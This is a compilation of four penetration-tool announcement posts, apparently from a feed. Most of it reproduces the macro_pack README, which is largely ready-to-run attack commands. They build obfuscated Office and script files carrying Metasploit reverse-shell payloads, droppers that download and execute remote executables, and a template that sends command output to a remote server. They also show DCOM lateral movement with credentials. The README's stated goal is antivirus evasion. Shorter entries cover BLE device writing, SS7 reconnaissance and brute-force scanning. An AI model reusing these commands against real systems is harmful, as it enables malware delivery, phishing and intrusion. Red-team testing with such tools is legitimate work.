BLEAH – A BLE Scanner For “Smart” Devices Hacking

A BLE scanner for “smart" devices hacking based on the bluepy library, dead easy to use because retarded devices should be dead easy to hack. Explanatory post and screenshots can be found here.How to InstallInstall bluepy from source:git clone https://github.com/IanHarvey/bluepy.gitcd bluepypython setup.py buildsudo python setup.py installThen install bleah:git clone https://github.com/evilsocket/bleah.gitcd bleahpython setup.py buildsudo python setup.py installUsageFrom the -h help menu:usage: bleah [-h] [-i HCI] [-t TIMEOUT] [-s SENSITIVITY] [-b MAC] [-f] [-e] [-u UUID] [-d DATA] [-r DATAFILE]optional arguments: -h, –help show this help message and exit -i HCI, –hci HCI HCI device index. -t TIMEOUT, –timeout TIMEOUT Scan delay, 0 for continuous scanning. -s SENSITIVITY, –sensitivity SENSITIVITY dBm threshold. -b MAC, –mac MAC Filter by device address. -f, –force Try to connect even if the device doesn’t allow to. -e, –enumerate Connect to available devices and perform services enumeration. -u UUID, –uuid UUID Write data to this characteristic UUID (requires –mac and –data). -d DATA, –data DATA Data to be written. -r DATAFILE, –datafile DATAFILE Read data to be written from this file.ExamplesKeep scanning for BTLE devices:sudo bleah -t0Connect to a specific device and enumerate all the things:sudo bleah -b "aa:bb:cc:dd:ee:ff" -eWrite the bytes hello world to a specific characteristic of the device:sudo bleah -b "aa:bb:cc:dd:ee:ff" -u "c7d25540-31dd-11e2-81c1-0800200c9a66" -d "hello world"Download BLEAH

Link: http://feedproxy.google.com/~r/PentestTools/~3/Mhqq4sdlgxk/bleah-ble-scanner-for-smart-devices.html

macro_pack – Tool Used To Automatize Obfuscation And Generation Of Ms Office Documents For Pentest, Demo, And Social Engineering Assessments

The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. This tool can be used for redteaming, pentests, demos, and social engineering assessments. macro_pack will simplify antimalware solutions bypass and automatize the process from vba generation to final Office document generation.It is very simple to use:No configurationEverything can be done using a single line of codeGeneration of majority of Office formats and VBS based formatsAdvanced VBA macro attacks as well as DDE attacksThe tool is compatible with payloads generated by popular pentest tools (Metasploit, Empire, …). It is also easy to combine with other tools as it is possible to read input from stdin and have a quiet output to another tool. This tool is written in Python3 and works on both Linux and Windows platform.Note: Windows platform with the right MS Office applications installed is required for Office documents automatic generation or trojan features.ObfuscationThe tool will use various obfuscation techniques, all automatic. Obfuscation feature is competible with all format that can be generated by macri_pack, VBA or VBS based.Basic obfuscation (-o option) includes:Renaming functionsRenaming variablesRemoving spacesRemoving commentsEncoding StringsNote that the main goal of macro_pack obfuscation is not to prevent reverse engineering, it is to prevent antivirus detection.GenerationMacro Pack can generate several kinds of MS office documents and scripts formats. The format will be automatically guessed depending on the given file extension. File generation is done using the option –generate or -G.Macro Pack pro version also allow to trojan existing files with option –trojan or -TMs Office Supported formats are:MS Word 97 (.doc)MS Word (.docm, .docx)MS Excel 97 (.xls)MS Excel (.xlsm)MS PowerPoint (.pptm)MS Visio 97 (.vsd)MS Visio (.vsdm)MS Project (.mpp)Scripting (txt) supported formats are:VBA text file (.vba)VBS text file (.vbs)Windows Script Host (.wsh)Windows Script Components scriptlets (.wsc, .sct)HTML Applications (.hta)Note that all scripting formats can be generated on Linux version of macro_pack as well.Ethical useThe macro_pack tool shall only be used by pentester, security researchers, or other people with learning purpose. I condamn all use of security tools for unethical actions (weather these ar legal or illegal). I know this will not prevent usage by malicious people and that is why all features are not publicly released.About pro mode…You may notice that not all part of macro_pack is available. Only the community version is available online. I fear the features in the pro version are really too much “weaponizing" the process and I do not want it available to all script kiddies out there. The pro mode includes features such as:Advance antimalware bypassVBOM security bypassSelf decoding VBAMS Office persistanceTrojan existing MS Office documentsLateral movement using DCOM objectsAnti-debug using http://seclists.org/fulldisclosure/2017/Mar/90For now I do not plan to release or sell this pro version however if you are really interrested I can share pro binary in the next case:You significally contribute to macro_pack on GitHub + I need to know your identityRun/InstallRun Windows binaryGet the latest binary from https://github.com/sevagas/macro_pack/releases/Download binary on PC with genuine Microsoft Office installed.Open console, CD to binary dir and call the binary, simple as that!macro_pack.exe –helpInstall from sourcesDownload and install dependencies:git clone https://github.com/sevagas/macro_pack.gitcd macro_packpip3 install -r requirements.txtNote: For windows, you also need to download manually pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/The tool is in python 3 so just start with with your python3 install. ex:python3 macro_pack.py –help# orpython macro_pack.py –help # if python3 is default installIf you want to produce a standalone exe using pyinstaller:Install PyCrypto at http://www.voidspace.org.uk/python/pycrypto-2.6.1/Double-click on the "build.bat" script on a Windows machine.The resulted macro_pack.exe will be inside the bin directory.Some examplesmacro_pack communityObfuscate the vba file generated by msfvenom and put result in a new vba file.msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vbaObfuscate Empire stager vba file and generate a MS Word document:macro_pack.exe -f empire.vba -o -G myDoc.docmGenerate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm" Create a word 97 document containing an obfuscated VBA reverse meterpreter payload inside a share folder:msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G \\REMOTE-PC\Share\meter.doc Download and execute Empire Launcher stager without powershell.exe by using DROPPER_PS template# 1 Generate a fiez containing Empire lauchcher # 2 Make that file available on web server, ex with netcat:{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat empire_stager.cmd; } | nc -l -p 6666 -q1# 3 Use macro\_pack to generate DROPPER_PS payload in Excel fileecho http://10.5.5.12:6543/empire_stager.cmd | macro_pack.exe -o -t DROPPER_PS -G join_the_empire.xls# 4 When executed on target, the macro will download PowerShdll, run it with rundll32, and download and execute stager.Execute calc.exe via Dynamic Data Exchange (DDE) attackecho calc.exe | macro_pack.exe –dde -G dde_test.docxDownload and execute file via powershell using Dynamic Data Exchange (DDE) attack# 1 Change the target file URL in resources\community\ps_dl_exec.cmd# 2 Embed download execute cmd in documentpython macro_pack.py –dde -f ..\resources\community\ps_dl_exec.cmd -G DDE.docGenerate obfuscated Meterpreter reverse TCP VBS file and run it# 1 Generate obfuscated VBS based on meterpreter templateecho <port> | macro_pack.exe -t METERPRETER -o -G meter.vbs# 2 On attacker machinge Setup meterpreter listenerOpen msfconsole:use exploit/multi/handlerset LHOST 0.0.0.0set PAYLOAD windows/meterpreter/reverse_tcpset AutoRunScript post/windows/manage/migrateset EXITFUNC threadset ExitOnSession falseset EnableUnicodeEncoding trueset EnableStageEncoding true# 3 run VBS file with wscript (run 32bit wscript because meterpreter payload is 32bit)%windir%\SysWoW64\wscript meter.vbsGenerated obfuscated HTA file which executes "systeminfo" and returns result to another macro_pack listening on 192.168.0.5# 1 Generate HTA file with CMD templateecho http://192.168.0.5:1234/a "systeminfo" | macro_pack.exe -t CMD -o -G info.hta# 2 On 192.168.0.5 open macro_pack as http listenermacro_pack.exe -l 1234# 3 run hta file with mshtamshta.exe full/path/to/info.htaGenerate obfuscated Meterpreter reverse https TCP SCT file and run it# 1 Generate obfuscated VBS scriptlet based on meterpreter reverse HTTPS templateecho <ip> <port> | macro_pack.exe -t WEBMETER -o -G meter.sct# 2 On attacker machinge Setup meterpreter listenerOpen msfconsole:use exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_httpsset LHOST <attacker_ip> # NOTE this cannot be 0.0.0.0 for reverse httpsset LPORT <port>set AutoRunScript post/windows/manage/migrateset EXITFUNC threadset ExitOnSession falseset EnableUnicodeEncoding trueset EnableStageEncoding trueexploit -j# 3 run scriptlet with regsvr32 regsvr32 /u /n /s /i:meter.sct scrobj.dllmacro_pack proTrojan the existing shared "report.xlsm" file with a dropper. Use anti-AV and anti-debug features.echo "http://10.5.5.12/drop.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER2 –trojan –av-bypass –stealth -G "E:\accounting\report.xls" Genenerate a Word file containing VBA self encoded x64 reverse meterpreter VBA payload (will bypass most AV). Keep-alive is needed because we need meterpreter to stay alive before we migrate.msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o –vbom-encode –keep-alive -G out.docmTrojan a PowerPoint file with a reverse meterpreter. Macro is obfuscated and mangled to bypass most antiviruses.msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o –av-bypass –trojan -G hotpics.pptmExecute a macro on a remote PC using DCOMREM Step 1: Ensure you have enough rightsnet use \\192.168.0.8\c$ /user:domain\username passwordREM Step 2: Generate document, for example here, meterpreter reverse TCP Excel fileecho 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G meter.xlsmREM Step 3: Copy the document somewhere on remote sharecopy meter.xlsm "\\192.168.0.8\c$\users\username\meter.xlsm"REM Step 4: Execute!macro_pack.exe –dcom="\\192.168.0.8\c$\users\username\meter.xlsm"REM Step 2 to 4 in one step:echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G "\\192.168.0.8\c$\users\username\meter.xlsm" –dcom="\\192.168.0.8\c$\users\username\meter.xlsm"All available optionsGeneral options: -f, –input-file=INPUT_FILE_PATH A VBA macro file or file containing params for –template option If no input file is provided, input must be passed via stdin (using a pipe). -q, –quiet Do not display anything on screen, just process request. -o, –obfuscate Same as ‘–obfuscate-form –obfuscate-names –obfuscate-strings’ –obfuscate-form Modify readability by removing all spaces and comments in VBA –obfuscate-strings Randomly split strings and encode them –obfuscate-names Change functions, variables, and constants names -s, –start-function=START_FUNCTION Entry point of macro file Note that macro_pack will automatically detect AutoOpen, Workbook_Open, or Document_Open as the start function -t, –template=TEMPLATE_NAME Use VBA template already included in macro_pack.exe. Available templates are: HELLO, CMD, DROPPER, DROPPER2, DROPPER_PS, DROPPER_DLL, METERPRETER, EMBED_EXE Help for template usage: macro_pack.exe -t help -G, –generate=OUTPUT_FILE_PATH. Generates a file containing the macro. Will guess the format based on extension. Supported extensions are: vba, vbs, hta, doc, docm, xls, xlsm, pptm, vsd, vsdm. Note: Apart from vba which is a text files, all other requires Windows OS with right MS Office application installed. -e, –embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document. Use with EMBED_EXE template to auto drop and exec the file. –dde Dynamic Data Exchange attack mode. Input will be inserted as a cmd command and executed via DDE DDE attack mode is not compatible with VBA Macro related options. Usage: echo calc.exe | macro_pack.exe –dde -W DDE.docx Note: This option requires Windows OS with genuine MS Office installed. –run=FILE_PATH Open document using COM to run macro. Can be useful to bypass whitelisting situations. This will trigger AutoOpen/Workbook_Open automatically. If no auto start function, use –start-function option to indicate which macro to run. -l, –listen=PORT Open an HTTP server listening on defined port. -h, –help Displays help and exit Notes: If no output file is provided, the result will be displayed on stdout. Combine this with -q option to pipe only processed result into another program ex: macro_pack.exe -f my_vba.vba -o -q | another_app Another valid usage is: cat input_file.vba | macro_pack.exe -o -q > output_file.vbamacro_pack Pro only: –vbom-encode Use VBA self encoding to bypass antimalware detection and enable VBOM access (will exploit VBOM self activation vuln). –start-function option may be needed. –av-bypass Use various tricks efficient to bypass most av (combine with -o for best result) –keep-alive Use with –vbom-encode option. Ensure new app instance will stay alive even when macro has finished –persist Use with –vbom-encode option. Macro will automatically be persisted in application startup path (works with Excel documents only). The macro will then be executed anytime an Excel document is opened (even non-macro documents). -T, –trojan=OUTPUT_FILE_PATH Inject macro in an existing MS office file. Supported files are the same as for the -G option. Files will also be converted to approriate format, ex: pres.pptx will become pres.pptm If file does not exist, it will be created (like -G option) –stealth Anti-debug and hiding features –dcom=REMOTE_FILE_PATH Open remote document using DCOM for pivot/remote exec if psexec not possible for example. This will trigger AutoOpen/Workboo_Open automatically. If no auto start function, use –start-function option to indicate which macro to run.Template usageTemplates can be called using -t, –template=TEMPLATE_NAME combined with other options.Here are all the available templates.HELLOJust print a hello message and awareness about macroGive this template the name or email of the author-> Example: echo "@Author" | macro_pack.exe -t HELLO -G hello.pptmCMDExecute a command line and send result to remote http serverGive this template the server url and the command to run-> Example: echo "http://192.168.0.5:7777" "dir /Q C:" | macro_pack.exe -t CMD -o -G cmd.doc# Catch result with any webserver or netcatnc -l -p 7777DROPPERDownload and execute a file.Give this template the file url and the target file path-> Example: echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER -o -G dropper.xlsDROPPER2Download and execute a file. File attributes are also set to system, read-only, and hidden.Give this template the file url and the target file path.-> Example: echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER2 -o -G dropper.xlsmDROPPER_PSDownload and execute Powershell script using rundll32 (to bypass blocked powershell.exe).Note: This payload will download PowerShdll from Github.Give this template the url of the powershell script you want to run-> Example: echo "<powershell_script_url>" | macro_pack.exe -t DROPPER_PS -o -G powpow.docDROPPER_DLLDownload a DLL with another extension and run it using Office VBA-> Example, load meterpreter DLL using Office:REM Generate meterpreter dll payloadmsfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f dll -o meter.dllREM Make it available on webserver, ex using netcat on port 6666{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat meter.dll; } | nc -l -p 6666 -q1REM Create OFfice file which will download DLL and call itREM The DLL URL is http://192.168.0.5:6666/normal.html and it will be saved as .asd fileecho "http://192.168.0.5:6666/normal.html" Run | macro_pack.exe -t DROPPER_DLL -o -G meterdll.xlsMETERPRETERMeterpreter reverse TCP template using MacroMeter by Cn33liz.This template is CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.Give this template the IP and PORT of listening mfsconsole-> Example: echo <ip> <port> | macro_pack.exe -t METERPRETER -o -G meter.docmRecommended msfconsole options (use exploit/multi/handler):set PAYLOAD windows/meterpreter/reverse_tcpset LHOST <ip>set LPORT <port>set AutoRunScript post/windows/manage/migrateset EXITFUNC threadset ExitOnSession falseset EnableUnicodeEncoding trueset EnableStageEncoding trueexploit -jWEBMETERMeterpreter reverse TCP template using VbsMeter by Cn33liz.This template is CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.Give this template the IP and PORT of listening mfsconsole-> Example: echo <ip> <port> | macro_pack.exe -t WEBMETER -o -G meter.vsdRecommended msfconsole options (use exploit/multi/handler):set PAYLOAD windows/meterpreter/reverse_https (32bit)set PAYLOAD windows/x64/meterpreter/reverse_https (64bit)set AutoRunScript post/windows/manage/migrateset LHOST <ip>set LPORT <port>set EXITFUNC threadset ExitOnSession falseset EnableUnicodeEncoding trueset EnableStageEncoding trueexploit -jEMBED_EXECombine with –embed option, it will drop and execute (hidden) the embedded file.Optionaly you can give to the template the path where file should be extractedIf extraction path is not given, file will be extracted with random name in current path.-> Example1: macro_pack.exe -t EMBED_EXE –embed=%%windir%%\system32\calc.exe -o -G my_calc.vbs-> Example2: echo "path\\to\newcalc.exe" | macro_pack.exe -t EMBED_EXE –embed=%%windir%%\system32\calc.exe -o -G my_calc.docEfficiencyThe various features were tested against localy installed Antimalware solutions as well as online service. I ran multiple tests with several kind of payloads and macro_pack features. A majority of antivirus will be evaded by the simple "obfuscate" option. Features available in pro mode generally ensure full AV bypass.Example with Empire VBA stager:Here are the results of NoDistribute scanner for the regular Empire VBA stagerHere are the results with the macro_pack -o (–obfuscate) optionWarning: Do not submit your samples to online scanner (ex VirusTotal), Its the best way to break your stealth macro. I also suggest you do not submit to non reporting site such as NoDistribute. You cannot be sure what these sites will do with the data you submit. If you have an issue with macro_pack AV detection you can write to us for advice or submit an issue or pull request.Relevant resourcesBlog posts about MS Office security:http://blog.sevagas.com/?My-VBA-Bot (write a full VBA RAT, includes how to bypass VBOM protection)http://pwndizzle.blogspot.fr/2017/03/office-document-macros-ole-actions-dde.htmlhttps://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ (About Dynamic Data Exchange attacks)https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/Other useful links:https://github.com/p3nt4/PowerShdll (Run PowerShell with dlls only)https://gist.github.com/vivami/03780dd512fec22f3a2bae49f9023384 (Run powershel script with PowerShdll VBA implementation)https://enigma0x3.net/2016/03/15/phishing-with-empire/ (Generate Empire VBA payload)https://github.com/EmpireProject/Empirehttps://medium.com/@vivami/phishing-between-the-app-whitelists-1b7dcdab4279https://www.metasploit.com/https://github.com/Cn33liz/MacroMeterhttps://github.com/khr0x40sh/MacroShopDownload macro_pack

Link: http://feedproxy.google.com/~r/PentestTools/~3/L18DQzXLRXo/macropack-tool-used-to-automatize.html

GTScan – The Nmap Scanner for Telco

The Nmap Scanner for Telco. With the current focus on telecom security, there used tools in day to day IT side penetration testing should be extended to telecom as well. From here came the motivation for an nmap-like scanner but for telcoThe current security interconnect security controls might fail against reconnaissance , although mobile operators might implement SMS firewalls/proxies, Interconnect firewalls, some of those leak information that could be used for further information gathering process.The motivation behind this project, first adding a new toolking into the arsenal of telecom penetration testers. Second give the mobile operators a way to test their controls to a primitive methodology such as information gathering and reconnaissance.How does it workGTScan relies on using emtpy TCAP layers as probes to detect listening subsystem numbers (i.e application port numbers like 80 for http, 443 for https but for telecom nodes) on the respective global titles. With this way will be able to map the network and use the results to conduct targeted direct attacks to the respective nodes.GTScan includes Message handling: Return message on error in the SCCP layer to determine from the response what is the scanned node. If a TCAP abort message is returned with an error p-abortCause: unrecognizedMessageType (0) thus the destination nodes is listening on the SSN that was scanned, else then the scanner continues scanning on other SSNsYou can provide GTscan a range of global titles to be scanned, a comma-separated or a single GT to be scanned, along with other parametersRequirementspython3pyfiglet==0.7.5termcolor==1.1.0colorama==0.3.9And ofcourse an SS7/Sigtran access :)Usage./GTScan.py -G 201500000000,201500000002 -g 965123456780 -c 1 -C 2 -p 2905 -P 2906 -l 192.168.56.1 -r 192.168.56.102Download GTScan

Link: http://feedproxy.google.com/~r/PentestTools/~3/4xA__JuUvL4/gtscan-nmap-scanner-for-telco.html

OWASP-Nettacker – Automated Penetration Testing Framework

OWASP Nettacker project is created to automate information gathering, vulnerability scanning and eventually generating a report for networks, including services, bugs, vulnerabilities, misconfigurations, and other information. This software will utilize TCP SYN, ACK, ICMP and many other protocols in order to detect and bypass Firewall/IDS/IPS devices. By leveraging a unique method in OWASP Nettacker for discovering protected services and devices such as SCADA. It would make a competitive edge compared to other scanner making it one of the bests. ______ __ _____ _____ / __ \ \ / /\ / ____| __ \ | | | \ \ /\ / / \ | (___ | |__) | | | | |\ \/ \/ / /\ \ \___ \| ___/ | |__| | \ /\ / ____ \ ____) | | Version 0.0.1 \____/ \/ \/_/ \_\_____/|_| SAME _ _ _ _ _ | \ | | | | | | | | github.com/viraintel | \| | ___| |_| |_ __ _ ___| | _____ _ __ owasp.org | . ` |/ _ \ __| __/ _` |/ __| |/ / _ \ ‘__| viraintel.com | |\ | __/ |_| || (_| | (__| < __/ | |_| \_|\___|\__|\__\__,_|\___|_|\_\___|_|usage: Nettacker [-L LANGUAGE] [-v VERBOSE_LEVEL] [-V] [-c] [-o LOG_IN_FILE] [--graph GRAPH_FLAG] [-h] [-i TARGETS] [-l TARGETS_LIST] [-m SCAN_METHOD] [-x EXCLUDE_METHOD] [-u USERS] [-U USERS_LIST] [-p PASSWDS] [-P PASSWDS_LIST] [-g PORTS] [-T TIMEOUT_SEC] [-w TIME_SLEEP] [-r] [-s] [-t THREAD_NUMBER] [-M THREAD_NUMBER_HOST] [-R SOCKS_PROXY] [--retries RETRIES] [--ping-before-scan] [--method-args METHODS_ARGS] [--method-args-list]Engine: Engine input options -L LANGUAGE, --language LANGUAGE select a language ['ru', 'fr', 'en', 'nl', 'el', 'vi', 'id', 'de', 'tr', 'ps', 'ur', 'fa', 'hy', 'hi', 'ko', 'it', 'zh-cn', 'ar', 'ja', 'es'] -v VERBOSE_LEVEL, --verbose VERBOSE_LEVEL verbose mode level (0-5) (default 0) -V, --version show software version -c, --update check for update -o LOG_IN_FILE, --output LOG_IN_FILE save all logs in file (results.txt, results.html, results.json) --graph GRAPH_FLAG build a graph of all activities and information, you must use HTML output. available graphs: ['d3_tree_v1_graph', 'd3_tree_v2_graph', 'jit_circle_v1_graph'] -h, --help Show Nettacker Help MenuTarget: Target input options -i TARGETS, --targets TARGETS target(s) list, separate with "," -l TARGETS_LIST, --targets-list TARGETS_LIST read target(s) from fileMethod: Scan method options -m SCAN_METHOD, --method SCAN_METHOD choose scan method ['ftp_brute', 'smtp_brute', 'ssh_brute', 'dir_scan', 'tcp_connect_port_scan', 'viewdns_reverse_ip_lookup_scan', 'all'] -x EXCLUDE_METHOD, --exclude EXCLUDE_METHOD choose scan method to exclude ['ftp_brute', 'smtp_brute', 'ssh_brute', 'dir_scan', 'tcp_connect_port_scan', 'viewdns_reverse_ip_lookup_scan'] -u USERS, --usernames USERS username(s) list, separate with "," -U USERS_LIST, --users-list USERS_LIST read username(s) from file -p PASSWDS, --passwords PASSWDS password(s) list, separate with "," -P PASSWDS_LIST, --passwords-list PASSWDS_LIST read password(s) from file -g PORTS, --ports PORTS port(s) list, separate with "," -T TIMEOUT_SEC, --timeout TIMEOUT_SEC read passwords(s) from file -w TIME_SLEEP, --time-sleep TIME_SLEEP time to sleep between each request -r, --range scan all IPs in the range -s, --sub-domains find and scan subdomains -t THREAD_NUMBER, --thread-connection THREAD_NUMBER thread numbers for connections to a host -M THREAD_NUMBER_HOST, --thread-hostscan THREAD_NUMBER_HOST thread numbers for scan hosts -R SOCKS_PROXY, --socks-proxy SOCKS_PROXY outgoing connections proxy (socks). example socks5: 127.0.0.1:9050, socks://127.0.0.1:9050, socks5://127.0.0.1:9050 or socks4: socks4://127.0.0.1:9050, authentication: socks://username:password@127.0.0.1, socks4://username:password@127.0.0.1, socks5://username:password@127.0.0.1 --retries RETRIES Retries when the connection timeout (default 3) --ping-before-scan ping before scan the host --method-args METHODS_ARGS enter methods inputs, example: "ftp_brute_users=test,a dmin&ftp_brute_passwds=read_from_file:/tmp/pass.txt&ft p_brute_port=21" --method-args-list list all methods argsFeaturesIoT ScannerPython Multi Thread & Multi Process Network Information Gathering Vulnerability ScannerService and Device Detection ( SCADA, Restricted Areas, Routers, HTTP Servers, Logins and Authentications, None-Indexed HTTP, Paradox System, Cameras, Firewalls, UTM, WebMails, VPN, RDP, SSH, FTP, TELNET Services, Proxy Servers and Many Devices like Juniper, Cisco, Switches and many more… )Network Service AnalysisServices Brute Force TestingServices Vulnerability TestingHTTP/HTTPS Crawling, Fuzzing, Information Gathering and …HTML and Text OutputsThis project is at the moment in research and development phase and most of results/codes are not published yet.AboutOWASP Page: https://www.owasp.org/index.php/OWASP_NettackerHome: http://nettacker.z3r0d4y.com/Github: https://github.com/viraintel/OWASP-NettackerMailing List: https://groups.google.com/forum/#!forum/owasp-nettackerDocker Image: https://hub.docker.com/r/alirazmjoo/owaspnettacker/Download OWASP-Nettacker

Link: http://feedproxy.google.com/~r/PentestTools/~3/vegIVHSu2hk/owasp-nettacker-automated-penetration.html